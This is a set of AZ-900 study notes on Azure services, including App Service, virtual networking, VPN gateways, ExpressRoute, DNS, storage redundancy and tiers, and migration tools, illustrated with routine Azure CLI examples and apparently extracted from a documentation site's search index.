                            App Service is a compute platform that you can use to quickly build, deploy, and scale enterprise grade web apps, background jobs, mobile back-ends, and RESTful APIs in the programming language of your choice (it supports multiple languages, including .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python) without managing infrastructure (it also supports both Windows and Linux environments).

                            App service is a PaaS offering. It offers automatic scaling and high availability. It enables automated deployments from GitHub, Azure DevOps, or any Git repo to support a continuous deployment model.

                            App Service handles most of the infrastructure decisions you deal with in hosting web-accessible apps:

                            • Deployment and management are integrated into the platform.
                            • Endpoints can be secured.
                            • Sites can be scaled quickly to handle high traffic loads.
                            • The built-in load balancing and traffic manager provide high availability.
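
                             As a sketch, az webapp up packages the current folder, provisions a plan, and deploys in one step (the app name, runtime, and SKU are example values):

                             ```bash
                             # Run from the application's source directory
                             az webapp up --name demo-web-app --resource-group demo-rg \
                                 --runtime "PYTHON:3.11" --sku B1
                             ```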
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#web-apps","title":"Web apps","text":"

                            App Service includes full support for hosting web apps by using ASP.NET, ASP.NET Core, Java, Ruby, Node.js, PHP, or Python. You can choose either Windows or Linux as the host operating system.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#api-apps-azure-rest-api","title":"API apps (Azure Rest API)","text":"

                            Much like hosting a website, you can build REST-based web APIs by using your choice of language and framework. You get full Swagger support and the ability to package and publish your API in Azure Marketplace. The produced apps can be consumed from any HTTP- or HTTPS-based client.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#webjobs","title":"WebJobs","text":"

                            You can use the WebJobs feature to run a program (.exe, Java, PHP, Python, or Node.js) or script (.cmd, .bat, PowerShell, or Bash) in the same context as a web app, API app, or mobile app. They can be scheduled or run by a trigger. WebJobs are often used to run background tasks as part of your application logic.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#mobile-apps","title":"Mobile apps","text":"

                            Use the Mobile Apps feature of App Service to quickly build a back end for iOS and Android apps. With just a few actions in the Azure portal, you can store mobile app data in a cloud-based SQL database; authenticate customers against common social providers, such as MSA, Google, Twitter, and Facebook; send push notifications; execute custom back-end logic in C# or Node.js.

                            On the mobile app side, there's SDK support for native iOS and Android, Xamarin, and React native apps.

                             The Azure mobile app (not to be confused with the Mobile Apps feature above) provides iOS and Android access to your Azure resources when you're away from your computer. You can use it to:

                             • Access, manage, and monitor Azure accounts and resources.
                             • Monitor the health and status of Azure resources, check for alerts, and diagnose and fix issues.
                             • Stop, start, and restart a web app or virtual machine.
                             • Run Azure CLI or Azure PowerShell commands to manage Azure resources.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-advisor","title":"Azure Advisor","text":"

                             Azure Advisor is a free service that tracks your Azure consumption and offers recommendations, not only for cost savings but also for performance, reliability, and security.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#arm-templates","title":"ARM templates","text":"

                             ARM templates allow you to declaratively describe the resources you want to use, using JSON format. The template then creates those resources in parallel. For example, if you need 25 VMs, all 25 VMs will be created at the same time.
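
                             For example, previewing and then running a deployment (azuredeploy.json and its vmCount parameter are hypothetical):

                             ```bash
                             # --what-if previews the changes without applying them
                             az deployment group create --resource-group demo-rg \
                                 --template-file azuredeploy.json --parameters vmCount=25 --what-if

                             # The same command without the flag performs the actual (parallel) deployment
                             az deployment group create --resource-group demo-rg \
                                 --template-file azuredeploy.json --parameters vmCount=25
                             ```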

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#7-azure-virtual-networking","title":"7. Azure Virtual Networking","text":"

                            Azure virtual networks and virtual subnets enable Azure resources, such as VMs, web apps, and databases, to communicate with each other, with users on the internet, and with your on-premises client computers.

                            Azure virtual networking supports both public and private endpoints to enable communication between external or internal resources with other internal resources.

                            • Public endpoints have a public IP address and can be accessed from anywhere in the world.
                            • Private endpoints exist within a virtual network and have a private IP address from within the address space of that virtual network.

                            It provides the following key networking capabilities:

                            Isolation and segmentation: Azure virtual network allows you to create multiple isolated virtual networks. For name resolution, you can use the name resolution service that's built into Azure. You also can configure the virtual network to use either an internal or an external DNS server.

                            Internet communications: You can enable incoming connections from the internet by assigning a public IP address to an Azure resource, or putting the resource behind a public load balancer.

                            Communicate between Azure resources: Enable Azure resources to communicate securely with each other. Virtual networks can connect not only VMs but other Azure resources. Service endpoints can connect to other Azure resource types.

                             Communicate with on-premises resources: Azure virtual networks enable you to link resources together in your on-premises environment and within your Azure subscription.

                             • Point-to-site virtual private network connections are from a computer outside your organization back into your corporate network. In this case, the client computer initiates an encrypted VPN connection to connect to the Azure virtual network.
                             • Site-to-site virtual private networks link your on-premises VPN device or gateway to the Azure VPN gateway in a virtual network. In effect, the devices in Azure can appear as being on the local network. The connection is encrypted and works over the internet.
                             • Azure ExpressRoute provides dedicated private connectivity to Azure that doesn't travel over the internet. ExpressRoute is useful for environments where you need greater bandwidth and even higher levels of security.

                            Route network traffic: By default, Azure routes traffic between subnets on any connected virtual networks, on-premises networks, and the internet. Route tables allow you to define rules about how traffic should be directed. Border Gateway Protocol (BGP) works with Azure VPN gateways, Azure Route Server, or Azure ExpressRoute to propagate on-premises BGP routes to Azure virtual networks.

                             Filter network traffic: Azure virtual networks let you filter traffic between subnets.

                             • Network security groups are Azure resources that can contain multiple inbound and outbound security rules. You can define these rules to allow or block traffic based on factors such as source and destination IP address, port, and protocol.
                             • Network virtual appliances are specialized VMs that can be compared to a hardened network appliance. A network virtual appliance carries out a particular network function, such as running a firewall or performing wide area network (WAN) optimization.
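
                             A small sketch of the first option, an NSG that only admits inbound HTTPS (names and priority are example values):

                             ```bash
                             az network nsg create --resource-group demo-rg --name demo-nsg

                             # Lower priority number = evaluated first; default rules still apply after this
                             az network nsg rule create --resource-group demo-rg --nsg-name demo-nsg \
                                 --name allow-https --priority 100 --direction Inbound --access Allow \
                                 --protocol Tcp --destination-port-ranges 443
                             ```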

                            Connect virtual networks: You can link virtual networks together by using virtual network peering. Peering allows two virtual networks to connect directly to each other. Network traffic between peered networks is private, and travels on the Microsoft backbone network, never entering the public internet. Peering enables resources in each virtual network to communicate with each other. These virtual networks can be in separate regions, which allows you to create a global interconnected network through Azure.
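
                             Note that peering is directional, so it has to be created from each side (the virtual network names are placeholders and both vnets must already exist):

                             ```bash
                             az network vnet peering create --resource-group demo-rg --name vnetA-to-vnetB \
                                 --vnet-name vnetA --remote-vnet vnetB --allow-vnet-access
                             az network vnet peering create --resource-group demo-rg --name vnetB-to-vnetA \
                                 --vnet-name vnetB --remote-vnet vnetA --allow-vnet-access
                             ```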

                            User-defined routes (UDR) allow you to control the routing tables between subnets within a virtual network or between virtual networks. This allows for greater control over network traffic flow.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#8-azure-virtual-private-networks","title":"8. Azure Virtual Private Networks","text":"

                            A virtual private network (VPN) uses an encrypted tunnel within another network. VPNs are typically deployed to connect two or more trusted private networks to one another over an untrusted network (typically the public internet). Traffic is encrypted while traveling over the untrusted network to prevent eavesdropping or other attacks. VPNs can enable networks to safely and securely share sensitive information.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-vpn-gateway-instances","title":"Azure VPN Gateway instances","text":"

                             Azure VPN Gateway instances are deployed in a dedicated subnet of the virtual network and enable the following connectivity:

                             • Connect on-premises datacenters to virtual networks through a site-to-site connection.
                             • Connect individual devices to virtual networks through a point-to-site connection.
                             • Connect virtual networks to other virtual networks through a network-to-network connection.

                            When setting up a VPN gateway, you must specify the type of VPN - either policy-based or route-based:

• Policy-based VPN gateways statically specify the IP addresses of packets that should be encrypted through each tunnel. This type of device evaluates every data packet against those sets of IP addresses to choose the tunnel the packet will be sent through.
• In route-based gateways, IPsec tunnels are modeled as a network interface or virtual tunnel interface. IP routing (either static routes or dynamic routing protocols) decides which of these tunnel interfaces to use when sending each packet. Route-based VPNs are the preferred connection method for on-premises devices, since they're more resilient to topology changes such as the creation of new subnets.
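
A hedged sketch of deploying a route-based gateway with the Azure CLI: it assumes an existing vnet `vnet-a` that already contains a subnet named GatewaySubnet, and all other names and the SKU are illustrative. Gateway deployment takes tens of minutes, hence `--no-wait`:

```bash
# Public IP for the gateway
az network public-ip create --resource-group rg-demo --name pip-vpngw

# Deploy a route-based VPN gateway into the vnet's GatewaySubnet
az network vnet-gateway create \
  --resource-group rg-demo \
  --name vpngw-demo \
  --vnet vnet-a \
  --public-ip-addresses pip-vpngw \
  --gateway-type Vpn \
  --vpn-type RouteBased \
  --sku VpnGw1 \
  --no-wait
```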

                            Use a route-based VPN gateway if you need any of the following types of connectivity:

                            • Connections between virtual networks
                            • Point-to-site connections
                            • Multisite connections
                            • Coexistence with an Azure ExpressRoute gateway

                            There are a few ways to maximize the resiliency of your VPN gateway:

                            Active/standby: By default, VPN gateways are deployed as two instances in an active/standby configuration, even if you only see one VPN gateway resource in Azure. When planned maintenance or unplanned disruption affects the active instance, the standby instance automatically assumes responsibility for connections without any user intervention.

                            Active/active: With the introduction of support for the BGP routing protocol, you can also deploy VPN gateways in an active/active configuration. In this configuration, you assign a unique public IP address to each instance. You then create separate tunnels from the on-premises device to each IP address.

                            ExpressRoute failover: Another high-availability option is to configure a VPN gateway as a secure failover path for ExpressRoute connections. ExpressRoute circuits have resiliency built in. However, they aren't immune to physical problems that affect the cables delivering connectivity or outages that affect the complete ExpressRoute location.

                            Zone-redundant gateways: In regions that support availability zones, VPN gateways and ExpressRoute gateways can be deployed in a zone-redundant configuration. This configuration brings resiliency, scalability, and higher availability to virtual network gateways. These gateways require different gateway stock keeping units (SKUs) and use Standard public IP addresses instead of Basic public IP addresses.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#9-azure-expressroute","title":"9. Azure ExpressRoute","text":"

Azure ExpressRoute lets you extend your on-premises networks into the Microsoft cloud over a private connection, with the help of a connectivity provider. This connection is called an ExpressRoute circuit. Each connection between Microsoft cloud services (such as Microsoft Azure and Microsoft 365) and your offices, datacenters, or other facilities requires its own ExpressRoute circuit.

                            ExpressRoute connections don't go over the public Internet. ExpressRoute is a private connection from your on-premises infrastructure to your Azure infrastructure. Even if you have an ExpressRoute connection, DNS queries, certificate revocation list checking, and Azure Content Delivery Network requests are still sent over the public internet.

ExpressRoute connections offer several benefits:

• Connectivity to Microsoft cloud services across all regions in the geopolitical region.
                            • Global connectivity to Microsoft services across all regions with the ExpressRoute Global Reach.
                            • Dynamic routing between your network and Microsoft via Border Gateway Protocol (BGP).
                            • Built-in redundancy in every peering location for higher reliability.

                            ExpressRoute enables direct access to the following services in all regions:

                            • Microsoft Office 365
                            • Microsoft Dynamics 365
                            • Azure compute services, such as Azure Virtual Machines
                            • Azure cloud services, such as Azure Cosmos DB and Azure Storage
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#features","title":"Features","text":"

                            Global connectivity: For example, say you had an office in Asia and a datacenter in Europe, both with ExpressRoute circuits connecting them to the Microsoft network. You could use ExpressRoute Global Reach to connect those two facilities, allowing them to communicate without transferring data over the public internet.

Dynamic routing: ExpressRoute uses BGP to exchange routes between on-premises networks and resources running in Azure. This protocol enables dynamic routing between your on-premises network and services running in the Microsoft cloud.

                            Built-in redundancy: Each connectivity provider uses redundant devices to ensure that connections established with Microsoft are highly available. You can configure multiple circuits to complement this feature.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#expressroute-connectivity-models","title":"ExpressRoute connectivity models","text":"

                            ExpressRoute supports four models that you can use to connect your on-premises network to the Microsoft cloud:

                            Co-location at a cloud exchange: Your datacenter, office, or other facility is physically co-located at a cloud exchange, such as an ISP. In this case, you can request a virtual cross-connect to the Microsoft cloud.

Point-to-point Ethernet connection: A point-to-point Ethernet connection links your facility to the Microsoft cloud.

                            Any-to-any networks: With any-to-any connectivity, you can integrate your wide area network (WAN) with Azure by providing connections to your offices and datacenters. Azure integrates with your WAN connection to provide a connection like you would have between your datacenter and any branch offices.

Directly from ExpressRoute sites: You can connect directly into Microsoft's global network at peering locations strategically distributed across the world. ExpressRoute Direct provides dual 100-Gbps or 10-Gbps connectivity, which supports Active/Active connectivity at scale.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#10-azure-dns","title":"10. Azure DNS","text":"

                            Azure DNS is a hosting service for DNS domains that provides name resolution by using Microsoft Azure infrastructure. By hosting your domains in Azure, you can manage your DNS records using the same credentials, APIs, tools, and billing as your other Azure services. Azure DNS can manage DNS records for your Azure services and provide DNS for your external resources as well. Applications that require automated DNS management can integrate with the service by using the REST API and SDKs.

                            Azure DNS is based on Azure Resource Manager, which provides features such as:

                            • Azure role-based access control (Azure RBAC) to control who has access to specific actions for your organization.
                            • Activity logs to monitor how a user in your organization modified a resource or to find an error when troubleshooting.
                            • Resource locking to lock a subscription, resource group, or resource. Locking prevents other users in your organization from accidentally deleting or modifying critical resources.

                            Azure DNS also supports private DNS domains. This feature allows you to use your own custom domain names in your private virtual networks, rather than being stuck with the Azure-provided names.

                            Azure DNS also supports alias record sets. You can use an alias record set to refer to an Azure resource, such as an Azure public IP address, an Azure Traffic Manager profile, or an Azure Content Delivery Network (CDN) endpoint.

                            You can't use Azure DNS to buy a domain name. For an annual fee, you can buy a domain name by using App Service domains or a third-party domain name registrar. Once purchased, your domains can be hosted in Azure DNS for record management.
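
A minimal sketch of hosting a zone and adding a record with the Azure CLI; the zone `contoso.com`, resource group `rg-dns`, and IP address are placeholders:

```bash
# Create a DNS zone (contoso.com is a placeholder domain)
az network dns zone create --resource-group rg-dns --name contoso.com

# Add an A record: www.contoso.com -> 203.0.113.10 (a documentation IP range)
az network dns record-set a add-record \
  --resource-group rg-dns \
  --zone-name contoso.com \
  --record-set-name www \
  --ipv4-address 203.0.113.10

# Show the Azure name servers to configure at your domain registrar
az network dns zone show --resource-group rg-dns --name contoso.com --query nameServers
```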

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services","title":"Azure Storage Services","text":"","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#intro","title":"Intro","text":"

A storage account provides a unique namespace for your Azure Storage data that's accessible from anywhere in the world over HTTP or HTTPS. Data in this account is secure, highly available, durable, and massively scalable. When you create your storage account, you'll start by picking the storage account type. The type of account determines the storage services and redundancy options and has an impact on the use cases.

| Type | Supported services | Redundancy options | Usage |
|---|---|---|---|
| Standard general-purpose v2 | Blob Storage (including Data Lake Storage), Queue Storage, Table Storage, and Azure Files | LRS, GRS, RA-GRS, ZRS, GZRS, RA-GZRS | Standard storage account type for blobs, file shares, queues, and tables. Recommended for most scenarios using Azure Storage. If you want support for network file system (NFS) in Azure Files, use the premium file shares account type. |
| Premium block blobs | Blob Storage (including Data Lake Storage) | LRS, ZRS | Premium storage account type for block blobs and append blobs. Recommended for scenarios with high transaction rates, or that use smaller objects or require consistently low storage latency. |
| Premium file shares | Azure Files | LRS, ZRS | Premium storage account type for file shares only. Recommended for enterprise or high-performance scale applications. Use this account type if you want a storage account that supports both Server Message Block (SMB) and NFS file shares. |
| Premium page blobs | Page blobs only | LRS | Premium storage account type for page blobs only. |

                            Some acronyms here:

                            • Locally redundant storage (LRS)
                            • Geo-redundant storage (GRS)
                            • Read-access geo-redundant storage (RA-GRS)
                            • Zone-redundant storage (ZRS)
                            • Geo-zone-redundant storage (GZRS)
                            • Read-access geo-zone-redundant storage (RA-GZRS)

                            Storage account endpoints:

                            The following table shows the endpoint format for Azure Storage services.

| Storage service | Endpoint |
|---|---|
| Blob Storage | `https://<storage-account-name>.blob.core.windows.net` |
| Data Lake Storage Gen2 | `https://<storage-account-name>.dfs.core.windows.net` |
| Azure Files | `https://<storage-account-name>.file.core.windows.net` |
| Queue Storage | `https://<storage-account-name>.queue.core.windows.net` |
| Table Storage | `https://<storage-account-name>.table.core.windows.net` |
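
A hedged sketch: creating a general-purpose v2 account with the Azure CLI and confirming its blob endpoint. The account name `stdemo12345` and resource group `rg-demo` are illustrative; account names must be globally unique, lowercase, and 3-24 characters:

```bash
# Create a standard general-purpose v2 account with locally redundant storage
az storage account create \
  --resource-group rg-demo \
  --name stdemo12345 \
  --location westeurope \
  --sku Standard_LRS \
  --kind StorageV2

# The blob endpoint follows the format from the table above
az storage account show \
  --resource-group rg-demo \
  --name stdemo12345 \
  --query primaryEndpoints.blob
```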

                            Other data for the exam:

                            • Maximum capacity for storage accounts: 5 PB.
• Number of storage accounts per region per subscription: 250.
                            • Maximum number of virtual network rules and IP network rules allowed per storage account in Azure: 200
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-redundancy","title":"Azure storage redundancy","text":"

Data in an Azure Storage account is always replicated three times in the primary region. Azure Storage offers two options for how your data is replicated in the primary region: locally redundant storage (LRS) and zone-redundant storage (ZRS).

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-primary-region","title":"Redundancy in the primary region","text":"

                            Locally redundant storage (LRS)

                            Locally redundant storage (LRS) replicates your data three times within a single data center in the primary region. LRS provides at least 11 nines of durability (99.999999999%) of objects over a given year. LRS is the lowest-cost redundancy option and offers the least durability compared to other options. LRS protects your data against server rack and drive failures. However, if a disaster such as fire or flooding occurs within the data center, all replicas of a storage account using LRS may be lost or unrecoverable. To mitigate this risk, Microsoft recommends using zone-redundant storage (ZRS), geo-redundant storage (GRS), or geo-zone-redundant storage (GZRS).

                            Zone-redundant storage (ZRS)

                            For Availability Zone-enabled Regions, zone-redundant storage (ZRS) replicates your Azure Storage data synchronously across three Azure availability zones in the primary region. ZRS offers durability for Azure Storage data objects of at least 12 nines (99.9999999999%) over a given year. With ZRS, your data is still accessible for both read and write operations even if a zone becomes unavailable. Microsoft recommends using ZRS in the primary region for scenarios that require high availability. ZRS is also recommended for restricting replication of data within a country or region to meet data governance requirements.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#redundancy-in-the-secondary-region","title":"Redundancy in the secondary region","text":"

                            For applications requiring high durability, you can choose to additionally copy the data in your storage account to a secondary region that is hundreds of miles away from the primary region. If the data in your storage account is copied to a secondary region, then your data is durable even in the event of a catastrophic failure that prevents the data in the primary region from being recovered. When you create a storage account, you select the primary region for the account. The paired secondary region is based on Azure Region Pairs, and can't be changed.

                            By default, data in the secondary region isn't available for read or write access unless there's a failover to the secondary region. If the primary region becomes unavailable, you can choose to fail over to the secondary region. After the failover has completed, the secondary region becomes the primary region, and you can again read and write data.

                            Because data is replicated to the secondary region asynchronously, a failure that affects the primary region may result in data loss if the primary region can't be recovered. The interval between the most recent writes to the primary region and the last write to the secondary region is known as the recovery point objective (RPO). The RPO indicates the point in time to which data can be recovered. Azure Storage typically has an RPO of less than 15 minutes, although there's currently no SLA on how long it takes to replicate data to the secondary region.

                            Azure Storage offers two options for copying your data to a secondary region: geo-redundant storage (GRS) and geo-zone-redundant storage (GZRS). GRS is similar to running LRS in two regions, and GZRS is similar to running ZRS in the primary region and LRS in the secondary region.

                            Geo-redundant storage (GRS)

                            GRS copies your data synchronously three times within a single physical location in the primary region using LRS. It then copies your data asynchronously to a single physical location in the secondary region (the region pair) using LRS. GRS offers durability for Azure Storage data objects of at least 16 nines (99.99999999999999%) over a given year.

                            Geo-zone-redundant storage (GZRS)

                            GZRS combines the high availability provided by redundancy across availability zones with protection from regional outages provided by geo-replication. Data in a GZRS storage account is copied across three Azure availability zones in the primary region (similar to ZRS) and is also replicated to a secondary geographic region, using LRS, for protection from regional disasters. Microsoft recommends using GZRS for applications requiring maximum consistency, durability, and availability, excellent performance, and resilience for disaster recovery. GZRS is designed to provide at least 16 nines (99.99999999999999%) of durability of objects over a given year.

                            Read access to data in the secondary region (RA-GRS)

                            Geo-redundant storage (with GRS or GZRS) replicates your data to another physical location in the secondary region to protect against regional outages. However, that data is available to be read only if the customer or Microsoft initiates a failover from the primary to secondary region. However, if you enable read access to the secondary region, your data is always available, even when the primary region is running optimally. For read access to the secondary region, enable read-access geo-redundant storage (RA-GRS) or read-access geo-zone-redundant storage (RA-GZRS). Remember that the data in your secondary region may not be up-to-date due to RPO.
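
Since the redundancy option is simply the storage account SKU, an existing account can often be switched, for example from LRS to RA-GRS, with a single update (account and resource group names are illustrative; some conversions, such as to ZRS, require a migration instead):

```bash
# Upgrade an existing account to read-access geo-redundant storage
az storage account update \
  --resource-group rg-demo \
  --name stdemo12345 \
  --sku Standard_RAGRS
```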

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-storage-services_1","title":"Azure storage services","text":"
  1. Azure Blobs: A massively scalable object store for text and binary data. Also includes support for big data analytics through Data Lake Storage Gen2.
  2. Azure Files: Managed file shares for cloud or on-premises deployments.
  3. Azure Queues: A messaging store for reliable messaging between application components.
  4. Azure Disks: Block-level storage volumes for Azure VMs.
  5. Azure Tables: NoSQL table option for structured, non-relational data.
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-blobs","title":"Azure Blobs","text":"

Azure Blob storage is used to store massive amounts of data, such as text or binary data. It is unstructured, meaning that there are no restrictions on the kinds of data it can hold. Blob storage is ideal for:

                            • Serving images or documents directly to a browser.
                            • Storing files for distributed access.
                            • Streaming video and audio.
                            • Storing data for backup and restore, disaster recovery, and archiving.
                            • Storing data for analysis by an on-premises or Azure-hosted service.

                            Objects in blob storage can be accessed from anywhere in the world via HTTP or HTTPS. Users or client applications can access blobs via URLs, the Azure Storage REST API, Azure PowerShell, Azure CLI, or an Azure Storage client library.

                            Azure Storage offers different access tiers for your blob storage:

                            • Hot access tier: Optimized for storing data that is accessed frequently (for example, images for your website).
                            • Cool access tier: Optimized for data that is infrequently accessed and stored for at least 30 days (for example, invoices for your customers).
                            • Cold access tier: Optimized for storing data that is infrequently accessed and stored for at least 90 days.
                            • Archive access tier: Appropriate for data that is rarely accessed and stored for at least 180 days, with flexible latency requirements (for example, long-term backups).

                            Some considerations:

                            • Hot, cool, and cold access tiers can be set at the account level. The archive access tier isn't available at the account level.
                            • Hot, cool, cold, and archive tiers can be set at the blob level, during or after upload.
                            • Data in the cool and cold access tiers can tolerate slightly lower availability, but still requires high durability, retrieval latency, and throughput characteristics similar to hot data. For cool and cold data, a lower availability service-level agreement (SLA) and higher access costs compared to hot data are acceptable trade-offs for lower storage costs.
                            • Archive storage stores data offline and offers the lowest storage costs, but also the highest costs to rehydrate and access data.
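
A hedged sketch of working with tiers using the Azure CLI (account, container, and file names are assumptions; authentication flags are omitted). The tier can be chosen at upload time and changed later, for example when archiving old data:

```bash
# Upload a blob directly into the cool tier
az storage blob upload \
  --account-name stdemo12345 \
  --container-name backups \
  --name invoice-2023.pdf \
  --file ./invoice-2023.pdf \
  --tier Cool

# Later, move it to the archive tier for cheaper long-term storage
az storage blob set-tier \
  --account-name stdemo12345 \
  --container-name backups \
  --name invoice-2023.pdf \
  --tier Archive
```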
                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-files","title":"Azure Files","text":"

                            Azure File storage offers fully managed file shares in the cloud that are accessible via the industry standard Server Message Block (SMB) or Network File System (NFS) protocols. Azure Files file shares can be mounted concurrently by cloud or on-premises deployments. SMB Azure file shares are accessible from Windows, Linux, and macOS clients. NFS Azure Files shares are accessible from Linux or macOS clients.

                            PowerShell cmdlets and Azure CLI can be used to create, mount, and manage Azure file shares as part of the administration of Azure applications. You can create and manage Azure file shares using Azure portal and Azure Storage Explorer.
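
A minimal sketch, reusing the illustrative storage account from earlier examples: create an SMB share with the CLI, then mount it from a Linux client. The mount options follow the common SMB 3.0 pattern, and the account key is a placeholder:

```bash
# Create an SMB file share in an existing storage account
az storage share create --account-name stdemo12345 --name projects

# Mount the share from a Linux client over SMB 3.0 (key elided)
sudo mount -t cifs //stdemo12345.file.core.windows.net/projects /mnt/projects \
  -o vers=3.0,username=stdemo12345,password='<storage-account-key>',serverino
```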

Applications running in Azure can access data in the share via file system I/O APIs. In addition to System IO APIs, you can use Azure Storage Client Libraries or the Azure Storage REST API.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-queues","title":"Azure Queues","text":"

                            Azure Queue storage is a service for storing large numbers of messages. Once stored, you can access the messages from anywhere in the world via authenticated calls using HTTP or HTTPS. A queue can contain as many messages as your storage account has room for (potentially millions). Each individual message can be up to 64 KB in size. Queues are commonly used to create a backlog of work to process asynchronously.

                            Queue storage can be combined with compute functions like Azure Functions to take an action when a message is received.
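
A hedged sketch of the queue workflow with the Azure CLI (account, queue name, and message content are illustrative; authentication flags are omitted):

```bash
# Create a queue and enqueue a message
az storage queue create --account-name stdemo12345 --name orders

az storage message put \
  --account-name stdemo12345 \
  --queue-name orders \
  --content "process-order-42"

# A worker retrieves (and temporarily hides) the next message
az storage message get --account-name stdemo12345 --queue-name orders
```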

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-disks","title":"Azure Disks","text":"

Azure Disk storage, or Azure managed disks, are block-level storage volumes managed by Azure for use with Azure VMs. Conceptually, they're the same as a physical disk, but they're virtualized, offering greater resiliency and availability than a physical disk.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-tables","title":"Azure Tables","text":"

                            Azure Table storage stores large amounts of structured data. Azure tables are a NoSQL datastore that accepts authenticated calls from inside and outside the Azure cloud.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-migration-options","title":"Azure data migration options","text":"

Azure Migrate is a service that helps you migrate from an on-premises environment to the cloud:

• Unified migration platform: A single portal to start, run, and track your migration to Azure.
• Range of tools: Azure Migrate also integrates with other Azure services and tools, and with independent software vendor (ISV) offerings.
• Assessment and migration: In the Azure Migrate hub, you can assess and migrate your on-premises infrastructure to Azure.

                            Tools to help with migration:

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-discovery-and-assessment","title":"Azure Migrate: Discovery and assessment","text":"

                            Discover and assess on-premises servers running on VMware, Hyper-V, and physical servers in preparation for migration to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-migrate-server-migration","title":"Azure Migrate: Server Migration","text":"

                            Migrate VMware VMs, Hyper-V VMs, physical servers, other virtualized servers, and public cloud VMs to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#data-migration-assistant","title":"Data Migration Assistant","text":"

                            Data Migration Assistant is a stand-alone tool to assess SQL Servers. It helps pinpoint potential problems blocking migration. It identifies unsupported features, new features that can benefit you after migration, and the right path for database migration.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-database-migration-service","title":"Azure Database Migration Service","text":"

                            Migrate on-premises databases to Azure VMs running SQL Server, Azure SQL Database, or SQL Managed Instances.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-app-service-migration-assistant","title":"Azure App Service migration assistant","text":"

                            Azure App Service migration assistant is a standalone tool to assess on-premises websites for migration to Azure App Service. Use Migration Assistant to migrate .NET and PHP web apps to Azure.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azure-data-box","title":"Azure Data Box","text":"

Azure Data Box is a physical migration service that helps transfer large amounts of data in a quick, inexpensive, and reliable way. The secure data transfer is accelerated by shipping you a proprietary Data Box storage device that has a maximum usable storage capacity of 80 terabytes. The Data Box is transported to and from your datacenter via a regional carrier. A rugged case protects and secures the Data Box from damage during transit. You can order the Data Box device via the Azure portal to import or export data from Azure. Data Box is ideally suited to transfer data sizes larger than 40 TB in scenarios with no or limited network connectivity.

Use cases for importing data:

• Onetime migration - when a large amount of on-premises data is moved to Azure.
• Moving a media library from offline tapes into Azure to create an online media library.
• Migrating your VM farm, SQL Server, and applications to Azure.
• Moving historical data to Azure for in-depth analysis and reporting using HDInsight.
• Initial bulk transfer - when an initial bulk transfer is done using Data Box (seed), followed by incremental transfers over the network.
• Periodic uploads - when a large amount of data is generated periodically and needs to be moved to Azure.

Use cases for exporting data:

• Disaster recovery - when a copy of the data from Azure is restored to an on-premises network.
• Security requirements - when you need to be able to export data out of Azure due to government or security requirements.
• Migration back to on-premises or to another cloud service provider - when you want to move all the data back on-premises, or to another cloud service provider, export data via Data Box to migrate the workloads.

                            ","tags":["cloud","azure","az-900","course","certification"]},{"location":"cloud/azure/az-900-preparation/#azcopy","title":"AzCopy","text":"

                            In addition to large scale migration using services like Azure Migrate and Azure Data Box, Azure also has tools designed to help you move or interact with individual files or small file groups.

AzCopy is a command-line utility that you can use to copy blobs or files to or from your storage account. Synchronizing blobs or files with AzCopy is one-direction synchronization: you designate the source and destination, and AzCopy copies files or blobs in that direction. It doesn't synchronize bi-directionally based on timestamps or other metadata.
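
A hedged sketch (paths, account name, and SAS token are placeholders): copying a local directory into a blob container, then doing a one-way sync in the same direction:

```bash
# Copy a local folder up to a blob container (the URL carries a SAS token, elided here)
azcopy copy "./reports" "https://stdemo12345.blob.core.windows.net/backups?<SAS>" --recursive

# One-way sync: makes the destination match the source, never the reverse
azcopy sync "./reports" "https://stdemo12345.blob.core.windows.net/backups?<SAS>" --recursive
```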

